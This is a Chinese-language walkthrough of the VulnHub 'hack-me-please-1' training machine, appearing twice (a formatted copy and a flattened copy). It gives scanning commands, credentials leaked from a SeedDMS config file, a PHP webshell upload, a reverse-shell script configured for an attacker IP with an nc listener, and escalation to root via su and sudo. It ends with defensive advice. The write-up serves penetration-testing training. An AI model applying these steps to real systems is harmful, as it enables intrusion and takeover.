VulnHub-hack-me-please-1 靶场渗透
字数 1578 2025-08-13 21:33:25

VulnHub-hack-me-please-1 靶场渗透教学文档

靶场基本信息

  • 来源:VulnHub (https://vulnhub.com/entry/hack-me-please-1,731/)
  • 发布日期:2021年7月31日
  • 难度等级:容易
  • 目标:获取root权限
  • 运行环境:VirtualBox 6.1(仅主机模式网卡172.16.10.1)
  • 特别说明:完全为OSCP考试准备的简单靶场,不需要暴力破解

环境配置

  1. 攻击机:Kali Linux
  2. 网络配置:仅主机模式(Host-Only)
    • 攻击机IP:172.16.10.102
    • 靶机IP:172.16.10.108

渗透测试过程

一、信息收集阶段

  1. 主机发现

    netdiscover -r 172.16.10.0/24 -i eth0
    
  2. 端口扫描

    nmap -v -T4 -p- -A -oN nmap.log 172.16.10.108
    
    • 结果分析:重点关注开放的HTTP服务
  3. Web服务枚举

    • 初始访问:http://172.16.10.108
    • 目录扫描:
      dirsearch -u "http://172.16.10.108/"
      gobuster dir -u http://172.16.10.108/ -w /usr/share/wordlists/dirb/common.txt
      
  4. JS文件分析

    • 发现关键线索:/js/main.js
    • 找到SeedDMS文档管理系统路径:/seeddms51x/seeddms-5.1.22/
  5. 配置文件挖掘

    • 访问配置文件路径:http://172.16.10.108/seeddms51x/conf/
    • 获取数据库凭据:
      • 文件路径:/seeddms51x/conf/settings.xml
      • 数据库用户名:seeddms
      • 数据库密码:seeddms
  6. 数据库信息提取

    • 在seeddms数据库的tblUsers表中发现:
      • admin/123456 (MD5加密)
      • saket/Saket@#$1337

二、漏洞利用阶段

  1. 登录SeedDMS后台

    • 登录地址:http://172.16.10.108/seeddms51x/seeddms-5.1.22/out/out.Login.php
    • 使用凭证:admin/123456
  2. 文件上传漏洞利用

    • 路径:添加文档功能
    • 上传PHP webshell(如冰蝎马)
    • 上传后的文件位置:/data/1048576/[document_id]/1.php
      • 其中[document_id]为文档ID(本例中为7)
  3. 获取初始shell

    • 使用冰蝎连接webshell
    • 或者直接访问:http://172.16.10.108/seeddms51x/seeddms-5.1.22/data/1048576/7/1.php
  4. 反弹shell

    • 使用PHP反弹脚本(ch4nge.php):
    set_time_limit (0);
    $VERSION = "1.0";
    $ip = '172.16.10.102';
    $port = 8888;
    $chunk_size = 1400;
    $write_a = null;
    $error_a = null;
    $shell = 'uname -a; w; id; sh -i';
    $daemon = 0;
    $debug = 0;
    
    • 本地监听:nc -lvnp 8888
  5. 升级交互式shell

    python3 -c 'import pty;pty.spawn("/bin/bash")'
    

三、权限提升阶段

  1. 用户切换

    • 发现用户saket
    • 使用之前获得的凭证:saket/Saket@#$1337
    su saket
    
  2. 提权到root

    sudo su
    
    • 直接获取root权限

关键知识点总结

  1. 信息收集技巧

    • JS文件分析往往能发现隐藏路径
    • 配置文件泄露是常见漏洞点
    • 数据库默认凭据需要重点检查
  2. SeedDMS漏洞利用

    • 版本:5.1.22
    • 文件上传位置:添加文档功能
    • 上传后的文件路径规律:/data/1048576/[document_id]/1.php
  3. 权限提升路径

    • 通过数据库泄露的用户凭据进行横向移动
    • sudo su直接提权(简单靶场特性)

参考资源

  1. SeedDMS 5.1.22源码:https://sourceforge.net/p/seeddms/code/ci/5.1.22/tree/
  2. 原始渗透报告:https://nepcodex.com/2021/08/hack-me-please-walkthrough-vulnhub/
  3. 相关工具和脚本下载:https://pan.baidu.com/s/1TDpCDx82KhY4C5UmrUoHGg 提取码:jiay

防御建议

  1. 对敏感配置文件设置访问权限
  2. 避免使用默认数据库凭据
  3. 对文件上传功能实施严格过滤
  4. 限制sudo权限分配
  5. 定期更新文档管理系统
VulnHub-hack-me-please-1 靶场渗透教学文档 靶场基本信息 来源:VulnHub (https://vulnhub.com/entry/hack-me-please-1,731/) 发布日期:2021年7月31日 难度等级:容易 目标:获取root权限 运行环境:VirtualBox 6.1(仅主机模式网卡172.16.10.1) 特别说明:完全为OSCP考试准备的简单靶场,不需要暴力破解 环境配置 攻击机:Kali Linux 网络配置:仅主机模式(Host-Only) 攻击机IP:172.16.10.102 靶机IP:172.16.10.108 渗透测试过程 一、信息收集阶段 主机发现 端口扫描 结果分析:重点关注开放的HTTP服务 Web服务枚举 初始访问:http://172.16.10.108 目录扫描: JS文件分析 发现关键线索:/js/main.js 找到SeedDMS文档管理系统路径:/seeddms51x/seeddms-5.1.22/ 配置文件挖掘 访问配置文件路径:http://172.16.10.108/seeddms51x/conf/ 获取数据库凭据: 文件路径:/seeddms51x/conf/settings.xml 数据库用户名:seeddms 数据库密码:seeddms 数据库信息提取 在seeddms数据库的tblUsers表中发现: admin/123456 (MD5加密) saket/Saket@#$1337 二、漏洞利用阶段 登录SeedDMS后台 登录地址:http://172.16.10.108/seeddms51x/seeddms-5.1.22/out/out.Login.php 使用凭证:admin/123456 文件上传漏洞利用 路径:添加文档功能 上传PHP webshell(如冰蝎马) 上传后的文件位置:/data/1048576/[ document_ id ]/1.php 其中[ document_ id ]为文档ID(本例中为7) 获取初始shell 使用冰蝎连接webshell 或者直接访问:http://172.16.10.108/seeddms51x/seeddms-5.1.22/data/1048576/7/1.php 反弹shell 使用PHP反弹脚本(ch4nge.php): 本地监听: nc -lvnp 8888 升级交互式shell 三、权限提升阶段 用户切换 发现用户saket 使用之前获得的凭证:saket/Saket@#$1337 提权到root 直接获取root权限 关键知识点总结 信息收集技巧 JS文件分析往往能发现隐藏路径 配置文件泄露是常见漏洞点 数据库默认凭据需要重点检查 SeedDMS漏洞利用 版本:5.1.22 文件上传位置:添加文档功能 上传后的文件路径规律:/data/1048576/[ document_ id ]/1.php 权限提升路径 通过数据库泄露的用户凭据进行横向移动 sudo su直接提权(简单靶场特性) 参考资源 SeedDMS 5.1.22源码:https://sourceforge.net/p/seeddms/code/ci/5.1.22/tree/ 原始渗透报告:https://nepcodex.com/2021/08/hack-me-please-walkthrough-vulnhub/ 相关工具和脚本下载:https://pan.baidu.com/s/1TDpCDx82KhY4C5UmrUoHGg 提取码:jiay 防御建议 对敏感配置文件设置访问权限 避免使用默认数据库凭据 对文件上传功能实施严格过滤 限制sudo权限分配 定期更新文档管理系统